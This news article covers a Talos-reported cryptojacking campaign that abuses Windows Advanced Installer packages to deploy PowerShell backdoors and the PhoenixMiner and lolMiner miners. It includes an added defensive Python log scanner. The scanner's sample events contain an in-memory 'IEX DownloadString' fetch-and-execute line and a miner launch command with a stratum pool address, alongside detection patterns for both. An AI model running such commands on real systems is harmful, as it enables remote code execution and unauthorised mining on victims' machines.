A recent cyber attack has primarily affected users in France and Switzerland, with some cases reported in other countries including the United States, Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and even Vietnam.
According to analysis by Cisco’s Talos Intelligence, the attackers have been using a Windows tool to distribute cryptocurrency mining malware since November 2021. The attackers exploit Windows Advanced Installer, an application used by developers to package software installations, to execute malicious commands on infected machines.
The affected software installations are primarily related to 3D modeling and graphic design. Additionally, most of the software packages used in this malware campaign are written in the French language.
The investigation suggests that the victims span various industries, including architecture, engineering, construction, manufacturing, and entertainment, in French-speaking countries.
This illicit cryptocurrency mining campaign deploys malicious PowerShell and Windows scripts to execute commands and establish backdoors on victims’ machines. PowerShell scripts can run entirely in memory without writing files to the hard drive, which makes the attack harder to detect.
After setting up a backdoor, the attackers proceed to execute additional threats, such as the Ethereum cryptocurrency miners PhoenixMiner and lolMiner, both designed for multi-currency mining.
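Because in-memory PowerShell leaves little on disk, defenders typically rely on PowerShell Script Block Logging (Event ID 4104), which records script text as it executes. The following is an added example, not code from the article or from Talos: it scans a constructed set of 4104 events (hostnames and URLs are placeholders) for the miner names the article mentions, a mining-pool URI, and a download-and-execute-in-memory pattern.

```python
import re

# Constructed sample of PowerShell Script Block Logging events (Event ID 4104,
# Microsoft-Windows-PowerShell/Operational). The host name and the
# example.invalid URLs are placeholders, not indicators from the campaign.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Host": "ws-design-07",
     "ScriptBlockText": "Get-ChildItem C:\\Projects\\*.blend | Measure-Object"},
    {"EventID": 4104, "Host": "ws-design-07",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"},
    {"EventID": 4104, "Host": "ws-design-07",
     "ScriptBlockText": "Start-Process $env:TEMP\\lolMiner.exe -ArgumentList '--pool stratum+tcp://example.invalid:4444'"},
    # Event ID 4103 (module logging) is a different record type and is skipped.
    {"EventID": 4103, "Host": "ws-design-07", "ScriptBlockText": "Write-Host done"},
]

# Detection patterns: the two miner names come from the article; stratum://
# is the common mining-pool protocol scheme; the last pattern catches the
# classic "download a script and evaluate it in memory" idiom.
INDICATORS = {
    "miner-binary": re.compile(r"\b(phoenixminer|lolminer)(\.exe)?\b", re.I),
    "mining-pool-uri": re.compile(r"stratum\+(tcp|ssl)://", re.I),
    "in-memory-download-exec": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloaddata)\b", re.I),
}


def scan_script_blocks(events):
    """Return one finding per (event, matching indicator) for 4104 records."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        text = ev.get("ScriptBlockText", "")
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                findings.append({"host": ev["Host"], "indicator": name, "script": text})
    return findings


if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_EVENTS):
        print(f"[{f['indicator']}] {f['host']}: {f['script']}")
```

A single script block that trips both the miner-name and pool-URI patterns, as the third sample does, is a much stronger signal than either alone and is a reasonable trigger for host isolation and process-tree review.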
It’s worth noting that this practice, known as cryptojacking, means installing cryptocurrency mining code on a device without the user’s knowledge or consent, so that the device mines cryptocurrency for the attacker.
Indications that malicious cryptocurrency mining software may be running on a device include overheating and sluggish performance.
Using malware to take control of devices in order to mine or steal cryptocurrency is not a new practice.
Recently, former smartphone giant BlackBerry identified malicious scripts actively targeting at least three sectors: financial services, healthcare, and government.